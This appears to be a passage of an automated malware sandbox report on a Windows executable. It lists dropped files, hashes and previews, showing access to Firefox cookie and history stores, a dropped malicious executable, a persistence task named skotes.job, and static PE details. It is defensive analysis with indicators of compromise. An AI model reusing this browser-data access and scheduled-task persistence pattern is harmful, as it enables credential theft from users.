                                                                                                                                                                                                                                                                                      Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_857984798\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):10388
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                      MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                      SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                      SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                      SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_857984798\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):962
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                      MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                      SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                      SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                      SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_857984798\f970459a-4e6b-43cb-b8c5-c71275f804ce.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):11185
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                      MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                      SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                      SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                      SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs-1.js

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):10547
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.495636072352606
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:/nTFTRR4YbBp6KLZNMGaXU6qU4rzy+/3/OYiNBw8d7Sl:LCe7FNMr4yrdwc0
                                                                                                                                                                                                                                                                                      MD5:8BFD2C43205BCE43D97E3327D081A39C
                                                                                                                                                                                                                                                                                      SHA1:EFD34FC1C9208C258426B35E2B0F078B9751D252
                                                                                                                                                                                                                                                                                      SHA-256:B23FFE9A9F776DBCC29DA44635867476A34265569C22E32782195FF5E524034A
                                                                                                                                                                                                                                                                                      SHA-512:8889AE641716D91B8F2809713FB27D75D3C08E9D42FF34126B4EA2D5C3C366B56D726E9E6FC67444681FA33FEDF2E1B912A5B4118C32EDD5B9B38697635E7614
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):10547
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.495636072352606
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:/nTFTRR4YbBp6KLZNMGaXU6qU4rzy+/3/OYiNBw8d7Sl:LCe7FNMr4yrdwc0
                                                                                                                                                                                                                                                                                      MD5:8BFD2C43205BCE43D97E3327D081A39C
                                                                                                                                                                                                                                                                                      SHA1:EFD34FC1C9208C258426B35E2B0F078B9751D252
                                                                                                                                                                                                                                                                                      SHA-256:B23FFE9A9F776DBCC29DA44635867476A34265569C22E32782195FF5E524034A
                                                                                                                                                                                                                                                                                      SHA-512:8889AE641716D91B8F2809713FB27D75D3C08E9D42FF34126B4EA2D5C3C366B56D726E9E6FC67444681FA33FEDF2E1B912A5B4118C32EDD5B9B38697635E7614
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.json (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):90
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                                                                                                                      MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                                                                                      SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                                                                                      SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                                                                                      SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.json.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):90
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                                                                                                                      MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                                                                                      SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                                                                                      SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                                                                                      SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

                                                                                                                                                                                                                                                                                      C:\Users\user\DocumentsKJEGCFBGDH.exe

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1957888
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.949115024240714
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24576:JhsQPljqzshikccrx5emV+SJzyFNG8Fe9rCuoT8cGUNguuxmz3PZbTn/YSug2:DvljqwccrykhkGxW54UNgFUtD8x
                                                                                                                                                                                                                                                                                      MD5:8016C72A6E4BF40375E31E867F487FA7
                                                                                                                                                                                                                                                                                      SHA1:98CEE0E4A8751579ECE1E66CB6429EA912526410
                                                                                                                                                                                                                                                                                      SHA-256:6F8F6F652654B2CDF67A5FE92652E349DA600DFCA2076F3D41B9C336434DB169
                                                                                                                                                                                                                                                                                      SHA-512:769CB20163E136187B03E99DFEBEAAA4AC4B7815A95B105F511D2AE76BD38F9A882C53380745F1222FC6DCC64A1D8858E8E2E2484F9689B8BD1896B06A9B6685
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................pM...........@...........................M.....^.....@.................................W...k.......H....................OM.............................`OM..................................................... . ............................@....rsrc...H...........................@....idata ............................@... ..+.........................@...hicendxx......2.....................@...qvwfrqsg.....`M.....................@....taggant.0...pM.."..................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Windows\Tasks\skotes.job

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\DocumentsKJEGCFBGDH.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):302
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.441226180880772
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:bsqttXUhXUEZ+lX1CGdKUe6tE9+AQy0lBxl/hEt0:bNZ4Q1CGAFD9+nVBj/hEt0
                                                                                                                                                                                                                                                                                      MD5:B2134CC5524FA2CD23FE87DF46959932
                                                                                                                                                                                                                                                                                      SHA1:D99ED1CC0D56310EFC067ED46D54A0956335FECF
                                                                                                                                                                                                                                                                                      SHA-256:1340A7AE0D0DDBC8BF2EADBDD43AF6F4FB1C275C42D9725F36CA823E5A3364EE
                                                                                                                                                                                                                                                                                      SHA-512:C4A5B8DE4E768FF5CA14323D1ACDBC00B729471307180623CCC8E062F54B96BC840612C2863041BEE4B931575C9258C2EB6606250CF35FCC7CFDC54E504F81F0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:.....L.t..I...].6 .F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................7.@3P.........................

                                                                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.944886792748166
                                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                      File name:file.exe
                                                                                                                                                                                                                                                                                      File size:1'806'336 bytes
                                                                                                                                                                                                                                                                                      MD5:7a3b3989f1f3647dc9188a185b345d43
                                                                                                                                                                                                                                                                                      SHA1:475a5d5e48c0f25f8083ff7657e9d6958e39d2ad
                                                                                                                                                                                                                                                                                      SHA256:749a24775a9225dd27ed9d457d9a82ace5122cdcaaef5069ae3e802464e2c77b
                                                                                                                                                                                                                                                                                      SHA512:a0709cbff8c8a4a55de37bb2829c1b7922b96d5e74e71655d932a7bc355d6ccbeba0ce84f89698439ff2e3831a671cea427785d0f0024731bc04a6390a48ac8b
                                                                                                                                                                                                                                                                                      SSDEEP:49152:n+U/JBdKSFgDBdYxZwTmyVy+wXqw/5v6k7eWZy8SwHl:n+UxCIgB+IqAdw6al6kKWc8R
                                                                                                                                                                                                                                                                                      TLSH:E985337EF5E46E74CD9BC33AAE7B85A2C9801796CEDBB79D341DA270710B3C10A19811
                                                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                                                                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                                                                      Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Entrypoint:0xa90000
                                                                                                                                                                                                                                                                                      Entrypoint Section:.taggant
                                                                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                      Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                                                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                                                                      OS Version Minor:1
                                                                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                                                                      File Version Minor:1
                                                                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                                                                                                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                                                      jmp 00007F49A850277Ah
                                                                                                                                                                                                                                                                                      movd mm3, dword ptr [ebx]
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add cl, ch
                                                                                                                                                                                                                                                                                      add byte ptr [eax], ah
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [edi], al
                                                                                                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], dh
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax+00000000h], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [edi], al
                                                                                                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
